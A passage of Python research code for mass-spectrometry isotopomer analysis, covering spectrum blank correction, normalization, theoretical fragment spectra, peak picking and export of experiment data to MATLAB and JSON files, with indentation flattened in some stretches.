fragment_formulas = self.stage01_isotopomer_query.get_fragmentFormula_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type,met);
# frag c map
frag_cmap = {};
frag_cmap = self.stage01_isotopomer_query.get_precursorFormulaAndProductFormulaAndCMaps_metID(met,'-','tuning');
for frag in fragment_formulas:
# data
data_mat = [];
data_mat_cv = [];
data_mat, data_mat_cv = self.stage01_isotopomer_query.get_spectrum_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetIDAndFragmentFormula_dataStage01AveragesNormSum( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type,met,frag);
# combine into a structure
frag_tmp_int = [];
frag_tmp_str = [];
for f in frag_cmap[frag]:
if f:
frag_tmp_int.append(1);
frag_tmp_str.append('1');
else:
frag_tmp_int.append(0);
frag_tmp_str.append('0');
fieldname = 'x' + met_formatted+'_'+ re.sub('[-+]','',frag);
#struct_mat_data['x'+met_formatted+'_c'+''.join(frag_tmp_str)] = {'met':'x'+met_formatted+'_c',
# 'fragment':frag_tmp_int,
# 'data':data_mat,
# 'metfrag':'x'+met_formatted+'_c'+''.join(frag_tmp_str)};
mat_script = mat_script + ("%s.fragments.%s.met = '%s';\n" %(experiment_name,fieldname,'x'+met_formatted+'_c'));
mat_script = mat_script + ("%s.fragments.%s.fragment = %s';\n" %(experiment_name,fieldname,frag_tmp_int));
mat_script = mat_script + ("%s.fragments.%s.data = %s';\n" %(experiment_name,fieldname,data_mat));
mat_script = mat_script + ("%s.fragments.%s.metfrag = '%s';\n" %(experiment_name,fieldname,'x'+met_formatted+'_c'+''.join(frag_tmp_str)));
data_names = [];
data_stdev = [];
for i,d in enumerate(data_mat):
stdev = 0.0;
if data_mat_cv[i]: stdev = data_mat[i]*data_mat_cv[i]/100;
data_names.append(fieldname+str(i));
data_stdev.append(stdev);
experiment_stdev.append(stdev);
struct_data[fieldname] = {'met':'x'+met_formatted+'_c','fragment':frag_tmp_int,
'data_names':data_names,'data_ave':data_mat,'data_cv':data_mat_cv,
'data_stdev':data_stdev,'metfrag':'x'+met_formatted+'_c'+''.join(frag_tmp_str)};
#data_mat_reshape = numpy.array(data_mat).reshape((len(data_mat),1));
#frag_tmp_int_reshape = numpy.array(frag_tmp_int).reshape((len(frag_tmp_int),1));
#struct_mat_data = numpy.array([(['x'+met_formatted+'_c'],frag_tmp_int_reshape,data_mat_reshape,['x'+met_formatted+'_c'+''.join(frag_tmp_str)])], dtype=[('met', 'O'), ('fragment', 'O'), ('data', 'O'), ('metfrag', 'O')]);
#struct_mat_dtype = (fieldname.encode('ascii','ignore'),'O');
#struct_mat_data_list.append(struct_mat_data);
#struct_mat_dtype_list.append(struct_mat_dtype);
## dump the experiment to a matlab file
#experiment['input']=[];
##experiment['fragments']=struct_mat_data;
#experiment['fragments']=numpy.array([tuple(struct_mat_data_list)],dtype=struct_mat_dtype_list);
#experiment['ignored']=[];
#experiment['inputfrag']=inputfrag;
#experiment['std2']=0.015;
#experiment_mat = numpy.array([(experiment['fragments'],experiment['inputfrag'],experiment['std2'])],
# dtype = [('fragments','O'),('inputfrag','O'),('std2','O')]);
#savemat(filename_mat,{experiment_name:experiment_mat});
# dump the experiment to a matlab script to generate the matlab file in matlab
mat_script = mat_script + ("%s.input = [];\n" %experiment_name);
mat_script = mat_script + ("%s.ignored = [];\n" %experiment_name);
for k,v in inputfrag.items():
mat_script = mat_script + ("%s.inputfrag.%s = %s;\n" %(experiment_name,k,v));
mat_script = mat_script + ("%s.std2=0.015;\n" %experiment_name);
mat_script = mat_script + ("save('%s','%s');\n" %(experiment_name+'.mat',experiment_name));
with open(filename,'w') as f:
f.write(mat_script);
# dump the experiment to a json file
experiment['fragments']=struct_data;
experiment['inputfrag']={csource_name_I:inputfrag};
experiment['stdev']=numpy.mean(numpy.array(experiment_stdev));
with open(filename_dict,'w') as f:
json.dump(experiment,f,indent=4);
#internal methods:
    def build_precursorSpectrumFromMRMs(self,peakSpectrum_I,blankSpectrum_I):
        '''Sum MRM product-ion intensities into a precursor-mass spectrum,
        blank-correcting each (precursor,product) transition.

        A blank intensity is subtracted only when it is less than 50% of the
        sample intensity; otherwise the corrected contribution is 0.0
        (the transition is treated as background).'''
        # Input:
        # peakSpectrum_I = {fragment:{(precursor_mass,product_mass):intensity}}
        # blankSpectrum_I = {fragment:{(precursor_mass,product_mass):intensity}}
        # Output:
        # peakSpectrum_measured = {fragment:{mass:intensity}} (raw sums)
        # peakSpectrum_corrected = {fragment:{mass:intensity}} (blank-corrected sums)
        # peakSpectrum_normalized = {fragment:{mass:intensity}} (corrected / max)
        fragments_I = list(peakSpectrum_I.keys());
        # round all precursor/product masses in input for comparison:
        peakSpectrum_copy_I = {};
        for frag,spec in peakSpectrum_I.items():
            peakSpectrum_tmp = {};
            for masses,intensity in spec.items():
                # key on (rounded precursor, rounded product) so measured masses
                # can be matched against the rounded theoretical masses below
                peakSpectrum_tmp[(numpy.around(masses[0]),numpy.around(masses[1]))] = intensity;
            peakSpectrum_copy_I[frag] = peakSpectrum_tmp;
        blankSpectrum_copy_I = {};
        for frag,spec in blankSpectrum_I.items():
            blankSpectrum_tmp = {};
            for masses,intensity in spec.items():
                blankSpectrum_tmp[(numpy.around(masses[0]),numpy.around(masses[1]))] = intensity;
            blankSpectrum_copy_I[frag] = blankSpectrum_tmp;
        # theoretical isotopomer spectrum (max-normalized, rounded masses)
        peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
        # determine masses from fragments
        masses = [];
        peakSpectrum_measured = {};
        peakSpectrum_normalized = {};
        peakSpectrum_corrected = {};
        for frag,spec in peakSpectrum_theoretical.items():
            peakSpectrum_measured[frag] = None;
            peakSpectrum_corrected[frag] = None;
            peakSpectrum_normalized[frag] = None;
            if not spec: continue; #check if a carbon is even contained in the fragment
            masses = list(spec.keys());
            masses.sort(); # sort mass in massList
            masses_rounded = numpy.around(masses); # round masses to nearest digit for comparison
            # 1. copy data from peakSpectrum_I to peakSpectrum_measured based on theoretical fragments
            # 2. generate corrected spectrum
            intensityList = [];
            if frag in peakSpectrum_I:
                precursor_masses = [k[0] for k in peakSpectrum_copy_I[frag].keys()];
                measured_spec = {};
                corrected_spec = {};
                for i,mass in enumerate(masses_rounded): #iterate through theoretical precursor masses
                    measured = 0.0;
                    corrected = 0.0;
                    if mass in precursor_masses:
                        product_masses = [k[1] for k in peakSpectrum_copy_I[frag].keys() if k[0]==mass];
                        for product in product_masses: #iterate through measured product masses
                            if frag in blankSpectrum_copy_I:
                                blank_precursor_masses = [k[0] for k in blankSpectrum_copy_I[frag].keys()];
                                if mass in blank_precursor_masses:
                                    blank_product_masses = [k[1] for k in blankSpectrum_copy_I[frag].keys() if k[0]==mass];
                                    if product in blank_product_masses:
                                        # subtract the blank only when it is <50% of the
                                        # sample intensity; otherwise treat as background
                                        if blankSpectrum_copy_I[frag][(mass,product)]<0.5*peakSpectrum_copy_I[frag][(mass,product)]:
                                            corrected += peakSpectrum_copy_I[frag][(mass,product)]-blankSpectrum_copy_I[frag][(mass,product)];
                                            measured += peakSpectrum_copy_I[frag][(mass,product)]
                                        else:
                                            corrected += 0.0;
                                            measured += peakSpectrum_copy_I[frag][(mass,product)]
                                    else:
                                        # no matching blank transition: take sample intensity as-is
                                        corrected += peakSpectrum_copy_I[frag][(mass,product)];
                                        measured += peakSpectrum_copy_I[frag][(mass,product)]
                                else:
                                    corrected += peakSpectrum_copy_I[frag][(mass,product)];
                                    measured += peakSpectrum_copy_I[frag][(mass,product)]
                            else:
                                # fragment absent from the blank: no correction possible
                                corrected += peakSpectrum_copy_I[frag][(mass,product)];
                                measured += peakSpectrum_copy_I[frag][(mass,product)];
                    # record sums under the exact (unrounded) theoretical mass
                    measured_spec[masses[i]] = measured;
                    corrected_spec[masses[i]] = corrected;
                    intensityList.append(corrected);
                peakSpectrum_measured[frag] = measured_spec;
                peakSpectrum_corrected[frag] = corrected_spec;
                # normalize each spectrum:
                #NOTE: normalization by max to allow for later conversion to normalization by sum
                normalized = {};
                intensityListMax = max(intensityList);
                for k,v in peakSpectrum_corrected[frag].items():
                    if intensityListMax != 0: normalized[k] = v/intensityListMax;
                    else: normalized[k] = None;
                peakSpectrum_normalized[frag] = normalized;
        return peakSpectrum_measured, peakSpectrum_corrected, peakSpectrum_normalized;
    def build_productSpectrumFromMRMs(self,peakSpectrum_I,blankSpectrum_I):
        '''Sum MRM precursor-ion intensities into a product-mass spectrum,
        blank-correcting each (precursor,product) transition.

        Mirror of build_precursorSpectrumFromMRMs with the roles of the
        precursor and product masses swapped.'''
        # Input:
        # peakSpectrum_I = {fragment:{(precursor_mass,product_mass):intensity}}
        # blankSpectrum_I = {fragment:{(precursor_mass,product_mass):intensity}}
        # Output:
        # peakSpectrum_measured = {fragment:{mass:intensity}} (raw sums)
        # peakSpectrum_corrected = {fragment:{mass:intensity}} (blank-corrected sums)
        # peakSpectrum_normalized = {fragment:{mass:intensity}} (corrected / max)
        fragments_I = list(peakSpectrum_I.keys());
        # round all precursor/product masses in input for comparison:
        peakSpectrum_copy_I = {};
        for frag,spec in peakSpectrum_I.items():
            peakSpectrum_tmp = {};
            for masses,intensity in spec.items():
                peakSpectrum_tmp[(numpy.around(masses[0]),numpy.around(masses[1]))] = intensity;
            peakSpectrum_copy_I[frag] = peakSpectrum_tmp;
        blankSpectrum_copy_I = {};
        for frag,spec in blankSpectrum_I.items():
            blankSpectrum_tmp = {};
            for masses,intensity in spec.items():
                blankSpectrum_tmp[(numpy.around(masses[0]),numpy.around(masses[1]))] = intensity;
            blankSpectrum_copy_I[frag] = blankSpectrum_tmp;
        # theoretical isotopomer spectrum (max-normalized, rounded masses)
        peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
        # determine masses from fragments
        masses = [];
        peakSpectrum_measured = {};
        peakSpectrum_normalized = {};
        peakSpectrum_corrected = {};
        for frag,spec in peakSpectrum_theoretical.items():
            peakSpectrum_measured[frag] = None;
            peakSpectrum_corrected[frag] = None;
            peakSpectrum_normalized[frag] = None;
            if not spec: continue; #check if a carbon is even contained in the fragment
            masses = list(spec.keys());
            masses.sort(); # sort mass in massList
            masses_rounded = numpy.around(masses); # round masses to nearest digit for comparison
            # 1. copy data from peakSpectrum_I to peakSpectrum_measured based on theoretical fragments
            # 2. generate corrected spectrum
            intensityList = [];
            if frag in peakSpectrum_I:
                product_masses = [k[1] for k in peakSpectrum_copy_I[frag].keys()];
                measured_spec = {};
                corrected_spec = {};
                for i,mass in enumerate(masses_rounded): #iterate through theoretical product masses
                    measured = 0.0;
                    corrected = 0.0;
                    if mass in product_masses:
                        precursor_masses = [k[0] for k in peakSpectrum_copy_I[frag].keys() if k[1]==mass];
                        for precursor in precursor_masses: #iterate through measured precursor masses
                            if frag in blankSpectrum_copy_I:
                                blank_product_masses = [k[1] for k in blankSpectrum_copy_I[frag].keys()];
                                if mass in blank_product_masses:
                                    blank_precursor_masses = [k[0] for k in blankSpectrum_copy_I[frag].keys() if k[1]==mass];
                                    if precursor in blank_precursor_masses:
                                        # subtract the blank only when it is <50% of the
                                        # sample intensity; otherwise treat as background
                                        if blankSpectrum_copy_I[frag][(precursor,mass)]<0.5*peakSpectrum_copy_I[frag][(precursor,mass)]:
                                            corrected += peakSpectrum_copy_I[frag][(precursor,mass)]-blankSpectrum_copy_I[frag][(precursor,mass)];
                                            measured += peakSpectrum_copy_I[frag][(precursor,mass)]
                                        else:
                                            corrected += 0.0;
                                            measured += peakSpectrum_copy_I[frag][(precursor,mass)]
                                    else:
                                        # no matching blank transition: take sample intensity as-is
                                        corrected += peakSpectrum_copy_I[frag][(precursor,mass)];
                                        measured += peakSpectrum_copy_I[frag][(precursor,mass)]
                                else:
                                    corrected += peakSpectrum_copy_I[frag][(precursor,mass)];
                                    measured += peakSpectrum_copy_I[frag][(precursor,mass)]
                            else:
                                # fragment absent from the blank: no correction possible
                                corrected += peakSpectrum_copy_I[frag][(precursor,mass)];
                                measured += peakSpectrum_copy_I[frag][(precursor,mass)];
                    # record sums under the exact (unrounded) theoretical mass
                    measured_spec[masses[i]] = measured;
                    corrected_spec[masses[i]] = corrected;
                    intensityList.append(corrected);
                peakSpectrum_measured[frag] = measured_spec;
                peakSpectrum_corrected[frag] = corrected_spec;
                # normalize each spectrum:
                #NOTE: normalization by max to allow for later conversion to normalization by sum
                normalized = {};
                intensityListMax = max(intensityList);
                for k,v in peakSpectrum_corrected[frag].items():
                    if intensityListMax != 0: normalized[k] = v/intensityListMax;
                    else: normalized[k] = None;
                peakSpectrum_normalized[frag] = normalized;
        return peakSpectrum_measured, peakSpectrum_corrected, peakSpectrum_normalized;
    def compare_peakSpectrum_normMax(self,peakSpectrum_normalized_list_I,return_theoretical = False):
        '''Compute per-mass replicate statistics (n, mean, stdDev, absDev) for
        max-normalized spectra, compared against the theoretical spectrum.'''
        # Input:
        # peakSpectrum_normalized_list_I = [{fragment:{mass:intensity}}]
        # return_theoretical = if True, also return the theoretical spectra
        # Output:
        # peakSpectrum_stats_O = {fragment:{mass:{'n':integer,
        #                   'mean':fraction,
        #                   'stdDev':fraction,
        #                   'absDev':fraction}}
        # collect the union of fragments observed across all replicates
        fragments_all = [];
        for row in peakSpectrum_normalized_list_I:
            fragments_all.extend(list(row.keys()));
        fragments_I = list(set(fragments_all));
        #fragments_I = peakSpectrum_normalized_list_I[0].keys();
        peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
        peakSpectrum_stats_O = {};
        for frag in fragments_I:
            peakSpectrum_stats_O[frag] = {'n':None,
                                          'mean':None,
                                          'stdDev':None,
                                          'absDev':None};
            if not peakSpectrum_theoretical[frag]: continue; # no carbons in fragment
            intensityList = [];
            masses = [];
            stats = {};
            for peakSpectrum in peakSpectrum_normalized_list_I:
                intensityDict = {};
                peakSpectrumMasses = list(peakSpectrum_theoretical[frag].keys());
                for mass in peakSpectrumMasses:
                    # missing fragments/masses and None (unmeasured) peaks count as 0.0
                    if frag in peakSpectrum and mass in peakSpectrum[frag] and peakSpectrum[frag][mass] and peakSpectrum[frag][mass] > 0.0:
                        intensityDict[mass] = peakSpectrum[frag][mass];
                    else:
                        intensityDict[mass] = 0.0;
                    if not mass in masses: masses.append(mass);
                intensityList.append(intensityDict);
                ## uncomment to only compare measured masses
                #intensityDict = {};
                #peakSpectrumMasses = peakSpectrum[frag].keys();
                #for mass in peakSpectrumMasses:
                #    if peakSpectrum[frag][mass] > 0.0:
                #        intensityDict[mass] = peakSpectrum[frag][mass];
                #        if not mass in masses: masses.append(mass);
                #intensityList.append(intensityDict);
            for mass in masses:
                stats[mass] = None;
                data = [];
                for intensity in intensityList:
                    # only replicates with a positive intensity contribute to the stats
                    if intensity[mass]>0.0:data.append(intensity[mass]);
                if data:
                    intensity_array = numpy.array(data);
                    # absolute deviation from the theoretical intensity (when non-zero)
                    if peakSpectrum_theoretical[frag][mass]:abs_dev = abs(intensity_array.mean() - peakSpectrum_theoretical[frag][mass]);
                    else: abs_dev = None;
                    stats[mass] = {'n':len(intensity_array),
                                   'mean':intensity_array.mean(),
                                   'stdDev':intensity_array.std(),
                                   'absDev':abs_dev};
                else:
                    stats[mass] = {'n':0.0,
                                   'mean':0.0,
                                   'stdDev':0.0,
                                   'absDev':None};
            if stats: peakSpectrum_stats_O[frag] = stats;
        if return_theoretical:
            return peakSpectrum_stats_O,peakSpectrum_theoretical;
        else:
            return peakSpectrum_stats_O;
def compare_peakSpectrum_normSum(self,peakSpectrum_normalized_list_I,return_theoretical = False):
# Input:
# peakSpectrum_normalized_list_I = [{fragment:{mass:[measuredMass,intensity]}}]
# Output:
# peakSpectrum_stats_O = {fragment:{mass:{'n':integer,
# 'mean':fraction,
# 'stdDev':fraction,
# 'absDev':fraction}}
fragments_all = [];
for row in peakSpectrum_normalized_list_I:
fragments_all.extend(list(row.keys()));
fragments_I = list(set(fragments_all));
#fragments_I = peakSpectrum_normalized_list_I[0].keys();
peakSpectrum_theoretical = self.report_fragmentSpectrum_normSum(fragments_I,True);
peakSpectrum_stats_O = {};
for frag in fragments_I:
peakSpectrum_stats_O[frag] = {'n':None,
'mean':None,
'stdDev':None,
'absDev':None};
if not peakSpectrum_theoretical[frag]: continue; # no carbons in fragment
intensityList = [];
masses = [];
stats = {};
for peakSpectrum in peakSpectrum_normalized_list_I:
intensityDict = {};
peakSpectrumMasses = list(peakSpectrum_theoretical[frag].keys());
for mass in peakSpectrumMasses:
if frag in peakSpectrum and frag in peakSpectrum and mass in peakSpectrum[frag] and peakSpectrum[frag][mass] > 0.0:
intensityDict[mass] = peakSpectrum[frag][mass];
else:
intensityDict[mass] = 0.0;
if not mass in masses: masses.append(mass);
intensityList.append(intensityDict);
## uncomment to only compare measured masses
#intensityDict = {};
#peakSpectrumMasses = peakSpectrum[frag].keys();
#for mass in peakSpectrumMasses:
# if peakSpectrum[frag][mass] > 0.0:
# intensityDict[mass] = peakSpectrum[frag][mass];
# if not mass in masses: masses.append(mass);
#intensityList.append(intensityDict);
for mass in masses:
stats[mass] = None;
data = [];
for intensity in intensityList:
if intensity[mass]>0.0:data.append(intensity[mass]);
if data:
intensity_array = numpy.array(data);
if peakSpectrum_theoretical[frag][mass]:abs_dev = abs(intensity_array.mean() - peakSpectrum_theoretical[frag][mass]);
else: abs_dev = None;
stats[mass] = {'n':len(intensity_array),
'mean':intensity_array.mean(),
'stdDev':intensity_array.std(),
'absDev':abs_dev};
else:
stats[mass] = {'n':0.0,
'mean':0.0,
'stdDev':0.0,
'absDev':None};
if stats: peakSpectrum_stats_O[frag] = stats;
if return_theoretical:
return peakSpectrum_stats_O,peakSpectrum_theoretical;
else:
return peakSpectrum_stats_O;
def report_fragmentSpectrum_normMax(self,fragments_I,round_mass=False):
'''calculate the format spectrum as a list'''
# Input: formula_str_I
# Output: spectrum_lst_O
fragmentSpectrum_tmp = {};
fragmentSpectrum_O = {};
for formula_str_I in fragments_I:
fragmentSpectrum_tmp[formula_str_I] = None;
fragmentSpectrum_O[formula_str_I] = None;
formula_str = re.sub('[+-]', '', formula_str_I);
n12C = 0
n13C = 0
if 'C' not in Formula(formula_str)._elements: continue; #check if a carbon is even contained in the formula
if 0 in Formula(formula_str)._elements['C']:
n12C += Formula(formula_str)._elements['C'][0]; #get the # of Carbons
if 13 in Formula(formula_str)._elements['C']:
n13C += Formula(formula_str)._elements['C'][13]
mnumber = Formula(formula_str).isotope.massnumber #get the nominal mass number
spectrum = Formula(formula_str).spectrum() #get the spectrum
fragmentSpectrum = {}
intensityList = [];
for c in range(-n13C, n12C + 1):
if c<0:
fragmentSpectrum[Formula(formula_str).isotope.mass-1]=0.0;
intensityList.append(0.0);
else:
if mnumber+c in spectrum:
fragmentSpectrum[spectrum[mnumber+c][0]]=spectrum[mnumber+c][1];
intensityList.append(spectrum[mnumber+c][1]);
else:
fragmentSpectrum[Formula(formula_str).isotope.mass + c]=0.0;
intensityList.append(0.0);
fragmentSpectrum_tmp[formula_str_I] = fragmentSpectrum;
# by default, the spectrum is normalized to the sum of all intensities measured
# convert sum-normalized spectrum to max-normalized spectrum
intensityListMax = max(intensityList);
fragmentSpectrum = {};
for k,v in fragmentSpectrum_tmp[formula_str_I].items():
if round_mass:
fragmentSpectrum[int(numpy.round(k))] = v/intensityListMax;
else:
fragmentSpectrum[k] = v/intensityListMax;
fragmentSpectrum_O[formula_str_I] = fragmentSpectrum;
return fragmentSpectrum_O;
def report_fragmentSpectrum_normSum(self,fragments_I,round_mass=False):
'''calculate the fragment spectrum'''
# Input: formula_str_I
# Output: spectrum_lst_O
fragmentSpectrum_O = {};
for formula_str_I in fragments_I:
fragmentSpectrum_O[formula_str_I] = None;
formula_str = re.sub('[+-]', '', formula_str_I);
n12C = 0
n13C = 0
if 'C' not in Formula(formula_str)._elements: break; #check if a carbon is even contained in the formula
if 0 in Formula(formula_str)._elements['C']:
n12C += Formula(formula_str)._elements['C'][0]; #get the # of Carbons
if 13 in Formula(formula_str)._elements['C']:
n13C += Formula(formula_str)._elements['C'][13]
mnumber = Formula(formula_str).isotope.massnumber #get the nominal mass number
spectrum = Formula(formula_str).spectrum() #get the spectrum
fragmentSpectrum = {}
for c in range(-n13C, n12C + 1):
if c<0:
exact_mass = Formula(formula_str).isotope.mass+c;
if round_mass:
fragmentSpectrum[int(numpy.round(exact_mass))]=0.0;
else:
fragmentSpectrum[exact_mass]=0.0;
else:
if mnumber+c in spectrum:
exact_mass = spectrum[mnumber+c][0];
if round_mass:
fragmentSpectrum[int(numpy.round(exact_mass))]=spectrum[mnumber+c][1];
else:
fragmentSpectrum[exact_mass]=spectrum[mnumber+c][1];
else:
exact_mass = Formula(formula_str).isotope.mass + c
if round_mass:
fragmentSpectrum[int(numpy.round(exact_mass))]=0.0;
else:
fragmentSpectrum[exact_mass]=0.0;
fragmentSpectrum_O[formula_str_I] = fragmentSpectrum;
return fragmentSpectrum_O;
    def extract_peakData_normMax(self, peakData_I, fragments_I, res_I=0.3, round_mass=False):
        '''Pick the maximum-intensity peak within a mass window (+/- res_I) around
        each theoretical fragment mass, background-correct it, and normalize to
        the maximum intensity.'''
        # Input: peakData_I = mass:intensity
        #        res_I = mass window/resolution (default = 0.3);
        #        round_mass = if True, use integer-rounded theoretical masses
        # Output:
        # peakSpectrum_measured = {fragment:{mass:intensity}}
        # peakSpectrum_corrected = {fragment:{mass:intensity}}
        # peakSpectrum_normalized = {fragment:{mass:intensity}}
        '''The algorithm implement below does not track the peak width for calculation of peak area,
        nor for calculate of resolution using FWHM. However, compared to peak-picking algorithm
        implemented in analyst(r) and peakView(r), the intensities for most compounds match
        the intensities calculated as peaks (compare 140228_MRM_EPI/..._EPI to ..._EPI_peakList
        or 140228_ER_EPI/...I to ..._ER).'''
        # min peak height
        detectionThreshold = 2500.0
        # pre-sort for efficiency
        # sort masses in peakData
        keys = list(peakData_I.keys());
        keys.sort();
        # determine baseline intensity
        # based on the most occuring intensity (background threshold);
        # NOTE(review): mode() is presumably scipy.stats.mode; older scipy returns
        # an array of modal values — verify against the file's imports.
        values = numpy.array(list(peakData_I.values()));
        values_median = mode(values)[0];
        if len(values_median) > 1:
            baseline = float(max(values_median)); # min returned too much junk
        else:
            baseline = float(values_median);
        if round_mass:
            peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
        else:
            peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I);
        # determine masses from fragments
        masses = [];
        peakSpectrum_measured_qcqa = {};
        peakSpectrum_normalized_qcqa = {};
        peakSpectrum_corrected_qcqa = {};
        peakSpectrum_measured = {};
        peakSpectrum_normalized = {};
        peakSpectrum_corrected = {};
        for frag,spec in peakSpectrum_theoretical.items():
            peakSpectrum_measured_qcqa[frag] = None;
            peakSpectrum_corrected_qcqa[frag] = None;
            peakSpectrum_normalized_qcqa[frag] = None;
            peakSpectrum_measured[frag] = None;
            peakSpectrum_corrected[frag] = None;
            peakSpectrum_normalized[frag] = None;
            if not spec: continue; #check if a carbon is even contained in the fragment
            masses = list(spec.keys());
            masses.sort(); # sort mass in massList
            keyIndex = 0;
            keyMax = len(keys);
            measured_qcqa = {};
            measured = {};
            # single forward sweep over the sorted measured masses (keys);
            # keyIndex is NOT reset between masses, so each key is visited once
            # (assumes masses and keys are both in ascending order)
            for mass in masses: # iterate through each mass
                maxPeak = 0.0;
                keyMaxPeak = None;
                measured_qcqa[mass] = [keyMaxPeak,maxPeak];
                measured[mass] = maxPeak;
                while keyIndex<keyMax:
                    if keys[keyIndex] >= mass - res_I and keys[keyIndex] < mass + res_I:
                        # inside the window: track the maximum peak
                        peak = peakData_I[keys[keyIndex]];
                        if peak > maxPeak:
                            maxPeak = peak;
                            keyMaxPeak = keys[keyIndex];
                        keyIndex += 1;
                    elif keys[keyIndex] < mass - res_I:
                        # below the window: advance to the next key
                        keyIndex += 1;
                        continue;
                    elif keys[keyIndex] >= mass + res_I:
                        # past the window: record the best peak and move to the next mass
                        measured_qcqa[mass] = [keyMaxPeak,maxPeak];
                        measured[mass] = maxPeak;
                        break;
            if measured:
                peakSpectrum_measured_qcqa[frag] = measured_qcqa;
                peakSpectrum_measured[frag] = measured;
            else: break #no peaks were found for the fragment
            # correct intensity for background:
            # (peaks below detectionThreshold, or below the baseline, are set to 0.0)
            corrected_qcqa = {};
            #intensityList = [];
            for k,v in peakSpectrum_measured_qcqa[frag].items():
                if v[1] > detectionThreshold:
                    if v[1] - baseline > 0.0:
                        corrected_qcqa[k] = [v[0],v[1] - baseline];
                    else:
                        corrected_qcqa[k] = [v[0],0.0];
                else:
                    corrected_qcqa[k] = [v[0],0.0];
                #intensityList.append(corrected_qcqa[k][1]);
            peakSpectrum_corrected_qcqa[frag] = corrected_qcqa
            corrected = {};
            intensityList = [];
            for k,v in peakSpectrum_measured[frag].items():
                if v > detectionThreshold:
                    if v - baseline > 0.0:
                        corrected[k] = v - baseline;
                    else:
                        corrected[k] = 0.0;
                    intensityList.append(corrected[k]);
                else:
                    corrected[k] = 0.0;
                    intensityList.append(corrected[k]);
            peakSpectrum_corrected[frag] = corrected;
            # normalize each spectrum:
            normalized_qcqa = {};
            intensityListMax_qcqa = max(intensityList);
            for k,v in peakSpectrum_corrected_qcqa[frag].items():
                if intensityListMax_qcqa != 0: normalized_qcqa[k] = [v[0],v[1]/intensityListMax_qcqa];
                else: normalized_qcqa[k] = [v[0], None];
            peakSpectrum_normalized_qcqa[frag] = normalized_qcqa;
            normalized = {};
            intensityListMax = max(intensityList);
            for k,v in peakSpectrum_corrected[frag].items():
                if intensityListMax != 0: normalized[k] = v/intensityListMax;
                else: normalized[k] = None;
            peakSpectrum_normalized[frag] = normalized;
        return peakSpectrum_measured, peakSpectrum_corrected, peakSpectrum_normalized;
    def extract_peakData_normSum(self, peakData_I, fragments_I, res_I=0.3,round_mass=False):
        '''Pick the maximum-intensity peak within a mass window (+/- res_I) around
        each theoretical fragment mass, background-correct it, and normalize to
        the summed intensity.'''
        # Input: peakData_I = mass:intensity
        #        res_I = mass window/resolution (default = 0.3);
        #        round_mass = if True, use integer-rounded theoretical masses
        # Output:
        # peakSpectrum_measured = {fragment:{mass:intensity}}
        # peakSpectrum_corrected = {fragment:{mass:intensity}}
        # peakSpectrum_normalized = {fragment:{mass:intensity}}
        # min peak height
        detectionThreshold = 1000.0
        # pre-sort for efficiency
        # sort masses in peakData
        keys = list(peakData_I.keys());
        keys.sort();
        # determine baseline intensity
        # based on the most occuring intensity (background threshold);
        # NOTE(review): mode() is presumably scipy.stats.mode; older scipy returns
        # an array of modal values — verify against the file's imports.
        values = numpy.array(list(peakData_I.values()));
        values_median = mode(values)[0];
        if len(values_median) > 1:
            baseline = float(max(values_median)); # min returned too much junk
        else:
            baseline = float(values_median);
        # NOTE(review): this normSum variant calls report_fragmentSpectrum_normMax;
        # only the theoretical mass list is consumed below, so the normalization
        # mode of the theoretical spectrum has no effect — confirm intended.
        if round_mass:
            peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
        else:
            peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I);
        # determine masses from fragments
        masses = [];
        peakSpectrum_measured_qcqa = {};
        peakSpectrum_normalized_qcqa = {};
        peakSpectrum_corrected_qcqa = {};
        peakSpectrum_measured = {};
        peakSpectrum_normalized = {};
        peakSpectrum_corrected = {};
        for frag,spec in peakSpectrum_theoretical.items():
            peakSpectrum_measured_qcqa[frag] = None;
            peakSpectrum_corrected_qcqa[frag] = None;
            peakSpectrum_normalized_qcqa[frag] = None;
            peakSpectrum_measured[frag] = None;
            peakSpectrum_corrected[frag] = None;
            peakSpectrum_normalized[frag] = None;
            if not spec: continue; #check if a carbon is even contained in the fragment
            masses = list(spec.keys());
            masses.sort(); # sort mass in massList
            keyIndex = 0;
            keyMax = len(keys);
            measured_qcqa = {};
            measured = {};
            # single forward sweep over the sorted measured masses (keys);
            # keyIndex is NOT reset between masses, so each key is visited once
            # (assumes masses and keys are both in ascending order)
            for mass in masses: # iterate through each mass
                maxPeak = 0.0;
                keyMaxPeak = None;
                measured_qcqa[mass] = [keyMaxPeak,maxPeak];
                measured[mass] = maxPeak;
                while keyIndex<keyMax:
                    if keys[keyIndex] >= mass - res_I and keys[keyIndex] < mass + res_I:
                        # inside the window: track the maximum peak
                        peak = peakData_I[keys[keyIndex]];
                        if peak > maxPeak:
                            maxPeak = peak;
                            keyMaxPeak = keys[keyIndex];
                        keyIndex += 1;
                    elif keys[keyIndex] < mass - res_I:
                        # below the window: advance to the next key
                        keyIndex += 1;
                        continue;
                    elif keys[keyIndex] >= mass + res_I:
                        # past the window: record the best peak and move to the next mass
                        measured_qcqa[mass] = [keyMaxPeak,maxPeak];
                        measured[mass] = maxPeak;
                        break;
            if measured:
                peakSpectrum_measured_qcqa[frag] = measured_qcqa;
                peakSpectrum_measured[frag] = measured;
            else: break #no peaks were found for the fragment
            # correct intensity for background:
            # (peaks below detectionThreshold, or below the baseline, are set to 0.0)
            corrected_qcqa = {};
            #intensityList = [];
            for k,v in peakSpectrum_measured_qcqa[frag].items():
                if v[1] > detectionThreshold:
                    if v[1] - baseline > 0.0:
                        corrected_qcqa[k] = [v[0],v[1] - baseline];
                    else:
                        corrected_qcqa[k] = [v[0],0.0];
                else:
                    corrected_qcqa[k] = [v[0],0.0];
                #intensityList.append(corrected_qcqa[k][1]);
            peakSpectrum_corrected_qcqa[frag] = corrected_qcqa
            corrected = {};
            intensityList = [];
            for k,v in peakSpectrum_measured[frag].items():
                if v > detectionThreshold:
                    if v - baseline > 0.0:
